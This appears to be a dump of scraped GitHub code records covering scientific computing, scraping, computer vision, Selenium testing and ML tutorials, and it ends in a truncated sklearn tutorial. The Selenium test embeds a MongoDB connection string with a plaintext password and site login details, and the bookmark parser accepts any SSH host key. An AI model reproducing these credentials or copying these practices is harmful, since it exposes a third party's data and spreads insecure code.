facecolor=\"yellow\")\n\nplt.show()","repo_name":"Arwen0905/Python_Test","sub_path":"0610/a0610_03_fill_between填滿之間_numpy_plot模組.py","file_name":"a0610_03_fill_between填滿之間_numpy_plot模組.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71020990188","text":"import torch\nimport numpy as np\nfrom torch_geometric.nn import knn_graph\nfrom typing import Tuple, Optional, Union\n\nfrom ..graph import Graph\n\n\ndef connect_knn(pos: torch.Tensor,\n k: int,\n period: Optional[Union[None, Tuple]] = None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Connects nodes using the k-nearest neighbors algorithm.\n \n Args:\n pos (torch.Tensor): Node positions.\n k (int): Number of nearest neighbors.\n period (Optional[Tuple[float, float]], optional): Period of the domain along each axis.\n If None, the domain is not periodic. If an element is `None`, the corresponding axis is not periodic.\n If an element is \"auto\", the corresponding axis is periodic and the period is computed as the difference\n between the maximum and minimum values of the corresponding axis.\n\n Returns:\n Tuple[torch.Tensor, torch.Tensor]: Edge index and edge attributes.\n \"\"\"\n dim = pos.size(1) # Dimension of the problem\n if dim == 2:\n if period is None:\n dx, dy = None, None\n else:\n dx, dy = period\n elif dim == 3:\n if period is None:\n dx, dy, dz = None, None, None\n else:\n dx, dy, dz = period\n else:\n raise ValueError(f\"Invalid dimension: {dim}, must be 2 or 3.\")\n # Compute coordinates for knn algorithm\n if dx is not None: # If periodicity is stablished along the x-axis\n if dx == \"auto\": dx = pos[:,0].max() - pos[:,0].min()\n x = torch.stack( (torch.cos(2*np.pi/dx*pos[:,0]), torch.sin(2*np.pi/dx*pos[:,0])), dim=1 )\n else: # If periodicity is not stablished along the x-axis\n x = pos[:,0].unsqueeze(1)\n if dy is not None: # If periodicity is stablished along the y-axis\n if dy == \"auto\": dy = pos[:,1].max() - pos[:,1].min()\n y = torch.stack( (torch.cos(2*np.pi/dy*pos[:,1]), torch.sin(2*np.pi/dy*pos[:,1])), dim=1 )\n else: # If periodicity is not stablished along the y-axis\n y = pos[:,1].unsqueeze(1)\n if dim == 3:\n if dz is not None: # If periodicity is stablished along the z-axis\n if dz == \"auto\": dz = pos[:,2].max() - pos[:,2].min()\n z = torch.stack( (torch.cos(2*np.pi/dz*pos[:,2]), torch.sin(2*np.pi/dz*pos[:,2])), dim=1 )\n else: # If periodicity is not stablished along the z-axis\n z = pos[:,2].unsqueeze(1)\n # Concatenate coordinates\n coordinates = torch.cat( (x, y), dim=1) if dim == 2 else torch.cat( (x, y, z), dim=1)\n # Compute edge_index applying knn to the coordinates\n edge_index = knn_graph(coordinates, k=k)\n # Compute edge_attr\n edge_attr = pos[edge_index[1]] - pos[edge_index[0]]\n # Apply periodicity to edge_attr\n if dx is not None:\n edge_attr[edge_attr[:,0] < -dx/2.,0] += dx\n edge_attr[edge_attr[:,0] > dx/2.,0] -= dx\n if dy is not None:\n edge_attr[edge_attr[:,1] < -dy/2.,1] += dy\n edge_attr[edge_attr[:,1] > dy/2.,1] -= dy\n if dim == 3 and dz is not None:\n edge_attr[edge_attr[:,2] < -dz/2.,2] += dz\n edge_attr[edge_attr[:,2] > dz/2.,2] -= dz\n return edge_index, edge_attr\n\n\nclass ConnectKNN():\n \"\"\"Transformation class to connect nodes using the k-nearest neighbors algorithm.\n \n Args:\n k (int): Number of nearest neighbors.\n period (Optional[Tuple[float, float]], optional): Period of the domain along the $x$- and $y$-axes.\n\n Methods:\n __call__(graph: Graph) -> Graph: Connects nodes using the k-nearest neighbors algorithm. \n \"\"\"\n\n def __init__(self,\n k: int,\n period: Optional[Union[Tuple[float,float], Tuple[float,float,float]]] = (None, None),):\n self.k = k\n self.period = period\n\n def __call__(self, graph: Graph):\n graph.edge_index, graph.edge_attr = connect_knn(graph.pos, self.k, period=self.period)\n return graph","repo_name":"mario-linov/graphs4cfd","sub_path":"graphs4cfd/transforms/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"19137287747","text":"import json\nimport os\nimport sys\n\nimport paramiko\n\nfrom backend.helpers.logger_settings import logger\n\n\ndef get_bookmarks_from_local_directory():\n with open(JSONIN, \"r\", encoding='utf-8') as f:\n bookmarks = json.load(f)\n\n return bookmarks\n\n\ndef get_bookmarks_via_ssh():\n\n host, port, username, password, command = os.environ['SSH_HOST'], int(os.environ['SSH_PORT']), os.environ[\n 'SSH_USERNAME'], os.environ['SSH_PASSWORD'], os.environ['SSH_COMMAND']\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(host, port, username, password)\n\n stdin, stdout, stderr = ssh.exec_command(command)\n bookmarks = json.loads(''.join(stdout.readlines()))\n\n return bookmarks\n\n\n# TODO: это может хреново работать, ибо должно вызываться всего раз за отработку цикл\ndef find_folder(tree, depth=0):\n for count, elem in enumerate(tree):\n\n # первый if/else работ��ет с depth=0. С минимальной, корневой вложенностью\n # если нашли папку с закладками notion - возвращаем ее содержимое\n if int(elem['id']) == folder_id:\n return elem\n\n # если это не notion-папка\n else:\n # если это ссылка или элемент, присутствующий в folders_ids (то есть, уже натыкались на него раньше) - пропускаем\n if elem['type'] == 'url' or elem['id'] in folders_ids:\n continue\n\n # если это папка - добавляем в path строку типа id folder_name, добавляем глубину\n elif elem['type'] == 'folder':\n folders_ids.append(elem['id'])\n\n path.append(f'{count} {elem[\"name\"]}')\n depth = depth + 1\n\n # TODO: не очень понятно, зачем это нужно, не удалось найти usercase\n debug = find_folder(elem['children'], depth)\n\n if debug:\n return debug\n\n # если уровень вложенности - 1. Очищаем path и продолжаем поиск (ибо вложенности нет и можем возвращаться к нулевому - корневому уровню)\n if len(path) == 1:\n path.clear()\n\n find_folder(first_stage, 0)\n\n # если уровень вложенности больше 1\n else:\n new_path = path[0:depth - 1]\n path.clear()\n path.append(*new_path)\n\n for count in path:\n new_tree = first_stage[int(count.split()[0])]\n\n debug = find_folder(new_tree['children'], depth - 1)\n if debug:\n return debug\n\n\ndef parse_bookmarks():\n if os.environ['VIA_SSH'] == 'False':\n bookmarks = get_bookmarks_from_local_directory()\n\n elif os.environ['VIA_SSH'] == 'True':\n bookmarks = get_bookmarks_via_ssh()\n\n else:\n logger.critical('VIA_SHH env var is not set properly')\n sys.exit()\n\n global first_stage\n first_stage = bookmarks['roots']['bookmark_bar']['children']\n folder_data = find_folder(first_stage)\n\n try:\n bookmarks = [{\"title\": children['name'], \"page_url\": children.get('url'), \"id\": children['id']} for children in\n folder_data['children'] if children.get('url')]\n\n return bookmarks\n\n except TypeError as e:\n logger.critical('Возможно, ты неправильно указал id папки с закладками в переменных среды')\n logger.debug(f'\"error\": {e}')\n\n\nJSONIN = os.environ['JSONIN']\n\nfolders_ids = []\nfolder_id = int(os.environ['BOOKMARKS_FOLDER'])\n\npath = []\n","repo_name":"HappyCthulhu/notion_plugin","sub_path":"backend/helpers/parse_bookmarks.py","file_name":"parse_bookmarks.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39492506984","text":"# 10001st prime\n\n# By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.\n# What is the 10 001st prime number?\n\ndef SieveOfEratosthenes(n):\n\n # Boolean array with 0 to n(inclusive) \n prime = [True for _ in range(n + 1)]\n\n p = 2\n while (p * p < n):\n if prime[p] == True:\n # setting all the multiple from p^2 of p to be false\n for i in range(p*p, n, p):\n prime[i] = False\n p += 1\n \n primes = []\n\n for p in range(2, n+1):\n if prime[p]:\n primes.append(p)\n\n return primes\n\nn = 1000001\nprimes = SieveOfEratosthenes(n)\nprint(primes[10000])","repo_name":"AabhasKrJha/ProjectEuler","sub_path":"problem_007/problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17814003959","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nCreated on Thu Nov 30 13:23:58 2017\n\n@author: Anil\n\"\"\"\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nimport pandas as pd\n\ndef extract_avg_rest_rating():\n f= open(\"1 link to restaurants.txt\")\n f1 = open(\"3 other restaurants.txt\")\n f2 = open(\"4 avg rest rating.txt\", 'a+')\n pg = 1\n for line in f:\n restName = line.strip('\\n').split('\\t')[0]\n if not os.path.isfile(\"restaurantFiles/\" + restName + \"/\" + restName + str(pg) + \".html\"): continue\n \n r = open(\"restaurantFiles/\" + restName + \"/\" + restName + str(pg) + \".html\")\n soup = BeautifulSoup(r,'lxml') # parse the html content of the file\n r.close()\n try:\n rev = soup.find('div',{'class':re.compile('rating-info clearfix')})\n rating = rev.find('img',{'class':re.compile('offscreen')})['alt'].split(' ')[0]\n except:\n print(\"Exception occured\")\n rating = 1\n print(restName + '\\t' + str(rating))\n f2.write('\\n' + restName + '\\t' + str(rating))\n f.close()\n \n for line in f1:\n restName = line.strip('\\n').split('\\t')[0]\n if not os.path.isfile(\"restaurantFiles/otherFiles/\" + restName + \".html\"): continue\n r = open(\"restaurantFiles/otherFiles/\" + restName + \".html\")\n soup = BeautifulSoup(r,'lxml') # parse the html content of the file\n r.close()\n try:\n rev = soup.find('div',{'class':re.compile('rating-info clearfix')})\n rating = rev.find('img',{'class':re.compile('offscreen')})['alt'].split(' ')[0]\n except:\n print(\"Exception occured\")\n rating = 1\n print(restName + '\\t' + str(rating))\n f2.write('\\n' + restName + '\\t' + str(rating))\n f1.close() \n\ndef final_file():\n user_file = open(\"3 ratings by user.txt\")\n rest_file = open(\"4 avg rest rating.txt\")\n final_file = open(\"5 final file.txt\", 'a+')\n df2 = pd.read_table(rest_file, sep = '\\t')\n df2 = df2.drop_duplicates()\n rest_file.close()\n flag=0 #to skip first line\n for line in user_file:\n if flag == 0: flag = 1; continue\n restName = line.strip('\\n').split('\\t')[1]\n print(restName)\n if restName in df2.restName.tolist():\n print(line.strip(\"\\n\") + \"\\t\" + str(df2.avgRatingToThisRest[df2.restName==restName].item()))\n final_file.write(\"\\n\" + line.strip(\"\\n\") + \"\\t\" + str(df2.avgRatingToThisRest[df2.restName==restName].item()))\n final_file.close()\n user_file.close()\n \nextract_avg_rest_rating()\nfinal_file()\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"athadani2704/school_projects","sub_path":"Yelp Rating Prediction/python files/4 final dataset creation.py","file_name":"4 final dataset creation.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17448744994","text":"from collections import deque\r\n\r\nn, k = map(int, input().split())\r\n\r\nbelt = deque(list(map(int, input().split())))\r\nrobot = deque([0] * n)\r\n\r\ncount = 1\r\nwhile True:\r\n # 한칸 회전\r\n belt.rotate(1)\r\n robot.rotate(1)\r\n robot[-1] = 0\r\n\r\n # 모든 로봇 이동\r\n if sum(robot):\r\n for i in range(n-2, 0, -1):\r\n # 현재 칸에 로봇이 있는데 옆칸이 비어있고 내구도가 1이상이면\r\n if belt[i+1] > 0 and robot[i+1] == 0 and robot[i] == 1:\r\n belt[i+1] -= 1\r\n robot[i+1] = 1\r\n robot[i] = 0\r\n # 맨 끝에 있는 로봇 내리기\r\n robot[-1] = 0\r\n\r\n # 올리는 위치의 내구도가 0보다 크고 로봇이 없으면 새 로봇 올리기\r\n if belt[0] > 0 and robot[0] == 0:\r\n robot[0] = 1\r\n belt[0] -= 1\r\n\r\n\r\n if belt.count(0) >= k:\r\n print(count)\r\n break\r\n else:\r\n count += 1","repo_name":"leesh26/MyAlgorithm","sub_path":"백준/Gold/20055. 컨베이어 벨트 위의 로봇/컨베이어 벨트 위의 로봇.py","file_name":"컨베이어 벨트 위의 로봇.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72486144106","text":"''' Property of: Target Acquired (Design Team 4)\n\n Purpose of Use: Raspberry Pi HQC Calibration\n \n Description: This script is an application of the camera calibration algorithm presented in the \n OpenCV tutorial and uses distorted images of a chessboard to obtain intrinsic \n properties of a camera such as focal length and optic center. Ultimately, \n these properties generate two variables, \"dist\", and a camera calibration \n matrix, \"mtx\" that will be hardcoded in the \"thresholding.py\" script used\n for target recognition and the \"stitching.py\" script used for map generation\n to undistort images of the field. This will theoretically improve the accuracy\n of image identification, GPS calculations, and map stitching. ''' \n\n\n# Import modules\n\nimport numpy as np\nimport cv2 as cv\nimport glob\nimport os\n\nos.chdir(\"/Users/jcam98/Desktop/EducationInstitutions/UniversityofTexas/Courses/SPRING_2022/COE_374/Design_Project/Locally_Developed_Files/Camera_Calibration/Test_Images/trial_5\")\n\n# termination criteria\ncriteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n# Define interior (non-dimensionalized) object points:L(0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\nobjp = np.zeros((8*6,3), np.float32)\nobjp[:,:2] = np.mgrid[0:6,0:8].T.reshape(-1,2)\n# Arrays to store object points and image points from all the images.\nobjpoints = [] # 3d point in real world space\nimgpoints = [] # 2d points in image plane.\nimages = glob.glob('/Users/jcam98/Desktop/EducationInstitutions/UniversityofTexas/Courses/SPRING_2022/COE_374/Design_Project/Locally_Developed_Files/Camera_Calibration/Team_Chessboard_Images/Black_White/It_4/*.jpg')\n\nfor fname in images:\n img = cv.imread(fname) # Read image file into \"img\" object\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY) # Map RGB colorspace to Grayscale colorspace\n # Find the chess board corners\n ret, corners = cv.findChessboardCorners(gray, (6,8), None)\n # If found, add object points, image points (after refining them)\n if ret == True:\n objpoints.append(objp)\n corners2 = cv.cornerSubPix(gray,corners, (11,11), (-1,-1), criteria)\n imgpoints.append(corners)\n # Draw and display the corners\n cv.drawChessboardCorners(img, (6,8), corners2, ret)\n cv.imshow('img', img)\n cv.waitKey(5000)\ncv.destroyAllWindows()\n\n# Return camera matrix, distortion coefficients, rotation and translation vectors\n\nret, mtx, dist, rvecs, tvecs = cv.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\nimages = sorted(glob.glob('*.jpg'), key=os.path.basename)\n\ncount = 1\nfor i in images: \n\n i = cv.imread(i)\n\n h, w = i.shape[:2]\n\n # # Obtain new camera matrix for removing distortion from input image\n \n newcameramtx, roi = cv.getOptimalNewCameraMatrix(mtx, dist, (w,h), 1, (w,h))\n \n # # Undisortion Method 1: cv.undistort() \n \n #dst = cv.undistort(i, mtx, dist, None, newcameramtx)\n \n # # Undistortion Method 2: Using remapping\n \n mapx,mapy = cv.initUndistortRectifyMap(mtx,dist,None,newcameramtx,(w,h),5)\n dst = cv.remap(i,mapx,mapy,cv.INTER_LINEAR)\n \n #crop the image\n x, y, w, h = roi\n dst = dst[y:y+h, x:x+w]\n \n out_file = 'undst/image' + str(count) + '_undst.jpg'\n \n cv.imwrite(out_file, dst)\n \n count = count + 1\n ","repo_name":"JCam98/COE_374","sub_path":"Source_Files/Final/camera_calibration_standard.py","file_name":"camera_calibration_standard.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11874255310","text":"from time import sleep\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom pymongo import MongoClient\n\n\n# Necessary data\nmain_url = 'http://pt.dailybuzzbd.com/'\nemail = 'zahir@gmail.com'\npassword = '1234'\n\n# Data for new product.\nselector_name = '.apphub_AppName'\nselector_price = '.discount_final_price'\nselector_image = '.game_header_image_full'\nurl = 'https://store.steampowered.com/app/1777620/Soul_Hackers_2/'\n\n# xpaths\nhamburger_xpath = '//*[@id=\"dropdown-hamburger\"]'\nsignin_xpath = '/html/body/nav/nav[1]/div[2]/ul/li[1]/a'\nsignin_email_xpath = '//*[@id=\"email\"]'\nsignin_password_xpath = '//*[@id=\"password\"]'\nsignin_button_xpath = '/html/body/main/form/button'\nadmin_panel_xpath = '/html/body/nav/nav[1]/div[2]/ul/li[2]/a'\nnew_product_url_xpath = '//*[@id=\"new-product-url\"]'\nnew_product_name_xpath = '/html/body/main/div/div[1]/form/input[2]'\nnew_product_price_xpath = '/html/body/main/div/div[1]/form/input[3]'\nnew_product_image_xpath = '/html/body/main/div/div[1]/form/input[4]'\nnew_product_button_xpath = '/html/body/main/div/div[1]/form/button'\ndelete_product_xpath = '/html/body/main/nav/a[2]'\ndelete_product_input_xpath = '//*[@id=\"delete-product-input\"]'\ndelete_product_search_xpath = '/html/body/main/div/div[2]/form/button'\ndelete_product_button_xpath = '/html/body/main/div/div[2]/div/div[1]/button'\n\n# Connecting to mongodb\ndatabase_url = 'mongodb+srv://Zahir:zahir54uli@pricetracker.iopmqeb.mongodb.net/?retryWrites=true&w=majority'\nclient = MongoClient(database_url)\ndb = client.priceTracker\n\n# Initializing Driver.\noptions = Options()\noptions.headless = True\ndriver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n\n# Going to the page.\ndriver.get(main_url)\n\n# Go to Sign In page.\nhamburger = driver.find_element_by_xpath(hamburger_xpath)\nsignin = driver.find_element_by_xpath(signin_xpath)\nhamburger.click()\nsignin.click()\n# Sign In.\nsignin_email = driver.find_element_by_xpath(signin_email_xpath)\nsignin_password = driver.find_element_by_xpath(signin_password_xpath)\nsignin_button = driver.find_element_by_xpath(signin_button_xpath)\nsignin_email.send_keys(email)\nsignin_password.send_keys(password)\nsignin_button.click()\n# Go to admin panel\nhamburger = driver.find_element_by_xpath(hamburger_xpath)\nadmin_panel = driver.find_element_by_xpath(admin_panel_xpath)\nhamburger.click()\nadmin_panel.click()\n# Insert new data.\nnew_product_url = driver.find_element_by_xpath(new_product_url_xpath)\nnew_product_name = driver.find_element_by_xpath(new_product_name_xpath)\nnew_product_price = driver.find_element_by_xpath(new_product_price_xpath)\nnew_product_image = driver.find_element_by_xpath(new_product_image_xpath)\nnew_product_button = driver.find_element_by_xpath(new_product_button_xpath)\nnew_product_url.send_keys(url)\nnew_product_name.send_keys(selector_name)\nnew_product_price.send_keys(selector_price)\nnew_product_image.send_keys(selector_image)\nnew_product_button.click()\n\n# Wait for data to be stored in the database.\nsleep(5)\n\n# Check if the data has been stored.\n\nquery_count = db.scrapes.count_documents({'url': url})\n\n\nif query_count > 0:\n print('*** Data Input Successful! ***')\nelse:\n print('*** Data Input unsuccessful! ***')\n\n# Delete data.\ndelete_product = driver.find_element_by_xpath(delete_product_xpath)\ndelete_product_input = driver.find_element_by_xpath(delete_product_input_xpath)\ndelete_product_search = driver.find_element_by_xpath(delete_product_search_xpath)\ndelete_product.click()\ndelete_product_input.send_keys('Forza Horizon 5')\ndelete_product_search.click()\n\n# Wait for fetch to work and delete.\nsleep(5)\ndelete_product_button = driver.find_element_by_xpath(delete_product_button_xpath)\ndelete_product_button.click()\n# Wait for data to be deleted from the database.\nsleep(5)\n\nquery_count = db.scrapes.count_documents({'url': url})\n\n\nif query_count == 0:\n print('*** Data Delete Successful! ***')\nelse:\n print('*** Data Delete unsuccessful! ***')\n\n# Quiting the driver.\ndriver.quit()\n\n\n","repo_name":"zahlambo/Price_Tracker","sub_path":"Testing/Zahir 011181211/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37082960915","text":"import torch\nimport streamlit as st\nfrom PIL import Image\nfrom torchvision import transforms\nimport torch.nn as nn\n\nclass NewModel(nn.Module):\n\n def __init__(self): \n super(NewModel, self).__init__() \n\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3, padding=1)\n self.relu1 = nn.ReLU()\n self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3, padding=1) \n self.relu2 = nn.ReLU() \n self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2) \n self.conv3 = nn.Conv2d(64, 128, kernel_size=3, padding=1) \n self.relu3 = nn.ReLU() \n self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2) # Fully connected layers \n self.fc1 = nn.Linear(128 * 16 * 16, 128) # 16x16 is the feature map size after 3 pooling layers \n self.relu4 = nn.ReLU() \n self.dropout1 = nn.Dropout(0.1)\n self.fc2 = nn.Linear(128, 5) \n\n def forward(self, x): \n x = self.pool1(self.relu1(self.conv1(x))) \n x = self.pool2(self.relu2(self.conv2(x))) \n x = self.pool3(self.relu3(self.conv3(x))) \n x = x.view(x.size(0), -1) # Flatten the tensor \n x = self.dropout1(x) \n x = self.relu4(self.fc1(x)) \n x = self.fc2(x) \n return x\n \ntransform = transforms.Compose([transforms.Resize((128, 128)),\n transforms.ToTensor(), \n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\nmodel = NewModel()\nmodel.load_state_dict(torch.load('model.pt', map_location='cpu'))\nmodel.eval()\ndef predict(image):\n image = Image.open(image)\n image = transform(image)\n image = image.unsqueeze(0)\n with torch.no_grad():\n output = model(image)\n _, predicted = torch.max(output.data, 1)\n return predicted.item()\n\npredictions_map = {\n 0: 'Bracelet',\n 1: \"Eyeglasses\",\n 2: \"Floppers\",\n 3: \"Ring\",\n 4: \"Watch\"\n }\n\nst.title(\"Wearable Accessories Classification\")\nst.write(\"A minimal classifier for wearable accessories using PyTorch and Streamlit can classify between 5 classes of wearable accessories - [ Bracelet, Eyeglasses, Floppers, Ring, Watch ].\")\nfile = st.file_uploader(\"Upload Inference Image\", type=[\"jpg\", \"png\", \"jpeg\"])\nif file:\n image = Image.open(file)\n st.image(image, width=300)\n with st.spinner(\"Fetching Results...\"):\n predictions = predict(file)\n print(type(predictions))\n st.write(predictions_map[predictions])\n","repo_name":"eternal-f1ame/MP-1-VCL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38867334757","text":"import shutil\nimport os\nimport numpy as np\nimport flopy\nfrom flopy.utils.gridgen import Gridgen\n\ncpth = os.path.join('temp', 't061')\n# delete the directory if it exists\nif os.path.isdir(cpth):\n shutil.rmtree(cpth)\n# make the directory\nos.makedirs(cpth)\n\nexe_name = 'gridgen'\nv = flopy.which(exe_name)\n\nrun = True\nif v is None:\n run = False\n\n\ndef test_gridgen():\n\n # define the base grid and then create a couple levels of nested\n # refinement\n Lx = 10000.\n Ly = 10500.\n nlay = 3\n nrow = 21\n ncol = 20\n delr = Lx / ncol\n delc = Ly / nrow\n top = 400\n botm = [220, 200, np.random.random((nrow, ncol))]\n\n # create a dummy dis package for gridgen\n ms = flopy.modflow.Modflow()\n dis5 = flopy.modflow.ModflowDis(ms, nlay=nlay, nrow=nrow, ncol=ncol,\n delr=delr,\n delc=delc, top=top, botm=botm)\n\n sim = flopy.mf6.MFSimulation()\n gwf = gwf = flopy.mf6.ModflowGwf(sim)\n dis6 = flopy.mf6.ModflowGwfdis(gwf, nlay=nlay, nrow=nrow, ncol=ncol,\n delr=delr,\n delc=delc, top=top, botm=botm)\n\n gridgen_ws = cpth\n g = Gridgen(dis5, model_ws=gridgen_ws, exe_name=exe_name)\n g6 = Gridgen(dis6, model_ws=gridgen_ws, exe_name=exe_name)\n\n rf0shp = os.path.join(gridgen_ws, 'rf0')\n xmin = 7 * delr\n xmax = 12 * delr\n ymin = 8 * delc\n ymax = 13 * delc\n rfpoly = [[[(xmin, ymin), (xmax, ymin), (xmax, ymax), (xmin, ymax),\n (xmin, ymin)]]]\n g.add_refinement_features(rfpoly, 'polygon', 1, range(nlay))\n g6.add_refinement_features(rfpoly, 'polygon', 1, range(nlay))\n\n rf1shp = os.path.join(gridgen_ws, 'rf1')\n xmin = 8 * delr\n xmax = 11 * delr\n ymin = 9 * delc\n ymax = 12 * delc\n rfpoly = [[[(xmin, ymin), (xmax, ymin), (xmax, ymax), (xmin, ymax),\n (xmin, ymin)]]]\n g.add_refinement_features(rfpoly, 'polygon', 2, range(nlay))\n g6.add_refinement_features(rfpoly, 'polygon', 2, range(nlay))\n\n rf2shp = os.path.join(gridgen_ws, 'rf2')\n xmin = 9 * delr\n xmax = 10 * delr\n ymin = 10 * delc\n ymax = 11 * delc\n rfpoly = [[[(xmin, ymin), (xmax, ymin), (xmax, ymax), (xmin, ymax),\n (xmin, ymin)]]]\n g.add_refinement_features(rfpoly, 'polygon', 3, range(nlay))\n g6.add_refinement_features(rfpoly, 'polygon', 3, range(nlay))\n\n # if gridgen executable is available then do the main part of the test\n if run:\n\n # Use gridgen to build the grid\n g.build()\n g6.build()\n\n # test the different gridprops dictionaries, which contain all the\n # information needed to make the different discretization packages\n gridprops = g.get_gridprops_disv()\n gridprops = g.get_gridprops()\n #gridprops = g.get_gridprops_disu6()\n\n # test the gridgen point intersection\n points = [(4750., 5250.)]\n cells = g.intersect(points, 'point', 0)\n n = cells['nodenumber'][0]\n msg = ('gridgen point intersect did not identify the correct '\n 'cell {} <> {}'.format(n, 308))\n assert n == 308, msg\n\n # test the gridgen line intersection\n line = [[[(Lx, Ly), (Lx, 0.)]]]\n cells = g.intersect(line, 'line', 0)\n nlist = [n for n in cells['nodenumber']]\n nlist2 = [19, 650, 39, 630, 59, 610, 79, 590, 99, 570, 119, 550, 139,\n 530, 159, 510, 194, 490, 265, 455, 384]\n msg = ('gridgen line intersect did not identify the correct '\n 'cells {} <> {}'.format(nlist, nlist2))\n assert nlist == nlist2, msg\n\n # test getting a modflow-usg disu package\n mu = flopy.modflow.Modflow(version='mfusg', structured=False)\n disu = g.get_disu(mu)\n\n # test writing a modflow 6 disu package\n fname = os.path.join(cpth, 'mymf6model.disu')\n g6.to_disu6(fname)\n assert os.path.isfile(fname), \\\n 'MF6 disu file not created: {}'.format(fname)\n\n # test writing a modflow 6 disv package\n fname = os.path.join(cpth, 'mymf6model.disv')\n g6.to_disv6(fname)\n assert os.path.isfile(fname), \\\n 'MF6 disv file not created: {}'.format(fname)\n\n return\n\n\nif __name__ == '__main__':\n test_gridgen()\n","repo_name":"tikiri/Jayantha-Obeysekera","sub_path":"autotest/t061_test_gridgen.py","file_name":"t061_test_gridgen.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23646496931","text":"# 概念:两个函数或是多个函数之间互相切换的调用,本质是一个函数在执行,程序本身控制协程,在线程基础上开启协程\n# 优点:但线程内就实现并发效果,最大限度的利用cpu,成本低,扩展性好\n# 缺点:无法利用多核资源,协程需要和进程配合才能运行在多cpu上,进行阻塞操作时会阻塞掉整个程序\n\ndef service():\n while True:\n o = yield\n print('生产了第{}杯奶茶.....'.format(o))\n\n\n\ndef client():\n g = service()\n next(g)\n for i in range(10):\n g.send(i)\n print(\"消费了第{}杯奶茶,,,,\".format(i))\n\n\nif __name__ == \"__main__\":\n client()","repo_name":"xiaotiankeyi/PythonBase","sub_path":"python_processThreading/asynico_oo/coroutines_yield.py","file_name":"coroutines_yield.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19733023060","text":"\"\"\"\nThis module contains code explained\nin the \"Working With Text Data\" scikit-learn tutorial\nhttps://scikit-learn.org/stable/tutorial/text_analytics/working_with_text_data.html\nusing the \"Twenty Newsgroups\" dataset.\n\"\"\"\n\nfrom sklearn.datasets import fetch_20newsgroups\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier\n\nfrom sklearn.pipeline import Pipeline\n\nfrom sklearn import metrics\n\nfrom sklearn.model_selection import GridSearchCV\n\nimport numpy as np\n\ncategories = [\n 'alt.atheism',\n 'soc.religion.christian',\n 'comp.graphics',\n 'sci.med'\n]\n\n\n# --- load text data\ntwenty_train, twenty_test = [\n fetch_20newsgroups(subset=subset, categories=categories,\n shuffle=True, random_state=42)\n for subset in ['train', 'test']\n]\n\ntrain_data = twenty_train.data\ntrain_target = twenty_train.target\ntrain_target_names = twenty_train.target_names\n\ntest_data = twenty_test.data\ntest_target = twenty_test.target\ntest_target_names = twenty_test.target_names\n\n\n# --- build fq data from text\ncount_vect_t = CountVectorizer()\ncount_vect_t.fit(train_data)\ntrain_data_count_vect = count_vect_t.transform(train_data)\n\n\n# --- transform fq to TF-IDF\ntfidf_t = TfidfTransformer(use_idf=False) # can be True XXX\ntfidf_t.fit(train_data_count_vect)\ntrain_data_tfidf = tfidf_t.transform(train_data_count_vect)\n\n\n# --- train a MultinomialNB classifier -- an estimator (\"_e\")\nmultinb_e = MultinomialNB()\nmultinb_e.fit(train_data_tfidf, train_target)\n\n\n# --- predict values for new data -- just 2 documents\ntest_mini = ['God is love', 'OpenGL on the GPU is fast']\ntest_mini_count_vect = count_vect_t.transform(test_mini)\ntest_mini_tfidf = tfidf_t.transform(test_mini_count_vect)\n\npredicted = multinb_e.predict(test_mini_tfidf)\n\nfor doc, category in zip(test_mini, predicted):\n print('%r => %s' % (doc, train_target_names[category]))\n\n\n# --- same as the above, together as a Pipeline\ntext_clf = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', 